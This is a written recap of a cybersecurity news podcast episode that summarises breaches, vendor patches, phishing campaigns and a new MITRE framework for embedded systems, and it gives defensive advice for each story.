Good Morning Security Gang
Today’s CyberHub Podcast is packed with stories straight from the heart of the practitioner’s world. If you’re new to the show, welcome — this isn’t a marketing feed. It’s a CISO’s daily run through the real operational battlefield.
Today, we’re talking about Luxshare’s data leak, Oracle’s mega security patch, Zoom and GitLab emergency updates, and the bizarre case of FortiGate firewalls getting exploited even after patching. Plus, LastPass phishing returns, Cisco’s enterprise flaw, North Korea’s new developer-targeting scheme, and a wild Greek police sting involving fake mobile towers. We’ll close with something positive — MITRE’s new framework for embedded systems security.
Coffee cup cheers, y’all. Let’s roll.
"In security, our path is not paved. It's kind of like going on a hike in an unsanctioned trail. There's all kinds of ways you can get to the end of your hike. The question is the amount of difficulty you take on the path to get there. There's no easy way to do cyber. That's why the show's born." James Azar
Apple Supplier Luxshare Suffers Data Breach
We start with Luxshare Precision, a critical Apple manufacturing and supply chain partner, confirming a major data exposure. Threat actors posted sensitive production files, bills of materials, vendor contracts, and testing documents to extort payment.
While Apple’s core production remains unaffected, the data gives attackers leverage for supplier fraud and counterfeit reconnaissance — essentially a blueprint for social engineering and competitive theft.
Mitigation steps for supply chain partners:
Enable document fingerprinting and data loss prevention (DLP) triggers for external leaks.
Deploy brand lookalike detection and template alerting.
Notify vendors early — silence in supply chain breaches amplifies damage.
Oracle Drops 337 Patches in Massive Update
Oracle’s quarterly Critical Patch Update (CPU) dropped with 337 security fixes across Fusion Middleware, E-Business Suite, Communications, Java, MySQL, and more.
A staggering 235 vulnerabilities are remotely exploitable without authentication, making this one of Oracle’s largest updates in years.
Oracle performs quarterly updates due to the complexity of ERP downtime — each fix must be tested against business-critical workflows. But attackers start scanning within hours of release, so prioritize internet-exposed Oracle systems first, then internal business-critical ones.
As I said:
“Patch freeze or not, the minute Oracle publishes fixes, you’re already on borrowed time.”
Zoom and GitLab Push Urgent Security Fixes
Both Zoom and GitLab have issued critical updates addressing remote code execution (RCE) and authentication bypass vulnerabilities.
For Zoom, the most severe flaw — CVE-2025-13902 — allows remote participants to run arbitrary code via Node Multimedia Routers (MMRs). GitLab’s fixes patch MFA bypass and API DoS vulnerabilities that could allow unauthenticated abuse.
These collaboration and CI/CD systems are lateral movement heaven for attackers. Patch these before endpoints — they’re privileged bridges into your organization.
Fortinet’s “Patched” Firewall Still Being Exploited
In a worrying twist, threat hunters are reporting active exploitation of FortiGate devices even after admins applied patches for CVE-2025-59718.
This indicates incomplete remediation or persistence left behind from earlier compromise. Attackers are leveraging custom daemons, hidden cron jobs, and authentication backdoors that survive patch cycles.
If you patched, don’t assume you’re clean. Run:
Integrity sweeps comparing running processes against vendor baselines.
Credential rotations for all local and admin accounts.
Full reimaging if any anomaly remains — as I said, “If there’s doubt, there’s no doubt.”
LastPass Phishing Campaign Targets Backup Users
LastPass users are facing a new phishing campaign spoofing backup and restore alerts. These lures exploit residual data from the 2022 breach, tricking users into logging into fake recovery portals.
The goal: steal master passwords and seed phrases for downstream takeover.
Recommendations:
Add mail banners for “restore” or “backup” keywords.
Publicize a single official recovery process internally and externally.
Never act on emailed password reset links — go directly to the app or vault.
Cisco Enterprise Comms Vulnerability Exposed
Cisco disclosed CVE-2026-20045, affecting Enterprise Communications Stack (ComStack) systems — including messaging and edge connectors.
Exploiting the flaw could enable credential theft and call interception via misconfigured voice gateways. The biggest risk lies in unsegmented management networks.
To mitigate:
Restrict management VLAN exposure.
Patch during the next maintenance window.
Disable publicly accessible signaling interfaces immediately.
DPRK Targets macOS Developers Through VS Code Projects
North Korea continues its early lead in 2026 cyber activity, now targeting macOS developers using malicious Visual Studio Code projects.
Attackers share booby-trapped GitHub repos and Telegram “sample code”, which execute stealer payloads on build. These payloads collect Apple signing certs, repo tokens, and API keys, enabling supply chain poisoning.
Mac users should:
Block untrusted workspace settings in VS Code.
Enforce deny-by-default extension policies on managed systems.
Rotate signing certificates every 90 days.
Greek Police Bust Mobile Tower Scam Crew
Greek authorities dismantled a cybercrime ring using fake cell towers hidden in cars to intercept SMS messages and OTPs for banking fraud.
The group sent phishing texts disguised as legitimate banking alerts, redirecting victims’ calls and capturing credentials.
As I said:
“If it looks like your bank and smells like your bank, it’s still probably a thief in a rental car.”
Mitigation comes down to user awareness and transaction verification. SMS-based OTP remains a weak link — move toward app-based MFA wherever possible.
MITRE Launches Embedded System Security Framework
MITRE has announced the Embedded System Security Framework (ESSF), a long-awaited companion to its ATT&CK models — focused on IoT and OT devices.
The framework provides threat modeling, update path guidance, and lifecycle protections for embedded systems — a vital tool for industries running long-lived industrial and medical devices.
CISOs should use the ESSF to:
Require digitally signed OTA updates with rollback protections.
Maintain key storage in hardware roots of trust.
Map IoT devices to ATT&CK techniques for red-team exercises.
Action List
🔐 Verify supply chain exposure: Run DLP fingerprint scans on vendor data.
💾 Patch Oracle now: Prioritize externally exposed components.
📞 Update Zoom and GitLab before attackers exploit them.
🧱 Sweep FortiGate firewalls for persistence and backdoors.
🔑 Train users on phishing verification, especially around LastPass.
📡 Segment voice and comms VLANs for Cisco systems.
💻 Harden VS Code policies and isolate developer build environments.
🕵️♂️ Migrate away from SMS OTPs for financial operations.
⚙️ Adopt MITRE ESSF for OT and IoT lifecycle planning.
James Azar’s CISO’s Take
Today’s episode underscores one truth: complexity is the enemy of resilience. Every story — from Luxshare to Oracle to Fortinet — shows how interconnected systems multiply both business and cyber risk. A single supplier, a late patch, or a missed credential rotation can ripple across global operations.
My biggest takeaway? Cybersecurity is operational discipline disguised as chaos management. Whether it’s patching 300 Oracle flaws or teaching users not to click fake LastPass links, success comes from consistency, not panic. Fortify the basics, automate what you can, and never assume a patch means safety — it means begin checking if the patch worked.
We'll be back Monday morning at 9 a.m. Eastern here with all the latest cybersecurity news. So make sure to tune in. Then tomorrow on Friday, you'll get our weekly update directly in your inbox by signing up to cyberhubpodcast.com.
And on Saturday, a brand new article dropping. I don't have a topic yet. I'll be working on the article over the next few days. So stay tuned. That'll drop Saturday morning at 8 a.m. Until then, have a great rest of your day. Great weekend. It's a big storm headed everyone's way. So hopefully Monday we'll have electricity and a show. If not, stay tuned. I may be recording just shorter segments on our YouTube and posting them there.
Have a great rest of your day, y'all. And most importantly, stay cyber safe!
